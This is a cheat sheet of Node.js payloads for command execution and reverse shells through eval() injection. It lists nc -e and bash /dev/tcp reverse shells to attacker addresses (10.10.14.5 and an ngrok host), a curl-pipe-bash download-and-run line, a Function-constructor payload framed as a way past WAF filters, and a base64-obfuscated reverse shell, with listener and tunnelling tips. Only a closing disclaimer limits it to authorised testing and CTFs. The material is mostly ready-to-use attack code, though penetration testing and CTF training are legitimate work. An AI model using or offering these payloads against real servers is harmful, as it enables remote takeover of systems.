Useful JavaScript snippets for remote command execution, reverse shells, and post-exploitation via Node.js or vulnerable eval() injection.

πŸ“„ Basic Reverse Shell using child_process.exec()

require('child_process').exec('nc 0.tcp.in.ngrok.io 18402 -e /bin/sh')

πŸ“Œ Listener on attacker side:

nc -lvnp 18402

πŸ“„ Spawn a shell via spawn() method

require('child_process').spawn('/bin/sh', [])

This spawns an interactive shell on the server if injected.

πŸ“„ Execute a simple Linux command

require('child_process').exec('ls -la', function(error, stdout, stderr) {
    console.log(stdout)
})

πŸ“„ Download and execute a script (e.g., reverse shell script)

require('child_process').exec('curl http://10.10.14.5/rev.sh | bash')

πŸ“„ Reverse shell using bash and TCP

require('child_process').exec('bash -i >& /dev/tcp/10.10.14.5/9001 0>&1')

πŸ’‘ Use this when nc -e is restricted or not available.

πŸ“„ Eval payload to run commands (if input is eval’d)

eval("require('child_process').exec('id')")

πŸ“„ Using Function constructor for cleaner payload

Function("return process")().mainModule.require('child_process').exec('nc 10.10.14.5 4444 -e /bin/bash')

πŸ”’ Bypasses some WAF or keyword-based filters.

πŸ“„ Obfuscated reverse shell payload (base64 encoded)

eval(Buffer.from("cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ25jIDEwLjEwLjE0LjUgNDQ0NCAtZSAvYmluL2Jhc2gnKQ==", 'base64').toString())

βœ… Decode with:

echo 'cmVx...==' | base64 -d

πŸ§ͺ Useful Checks

βœ… Check if you’re in a Node.js environment

typeof process !== 'undefined'

βœ… Check for command execution support

typeof require('child_process').exec === 'function'

🎯 Tips for Exploitation

  • Use ngrok, serveo, or local port forwarding if public IP is not accessible.
  • Replace nc with wget, curl, or bash depending on what’s installed.
  • Always test in a safe lab environment.

⚠️ Always get proper authorization before using these techniques. Intended for ethical hacking, CTFs, and training only.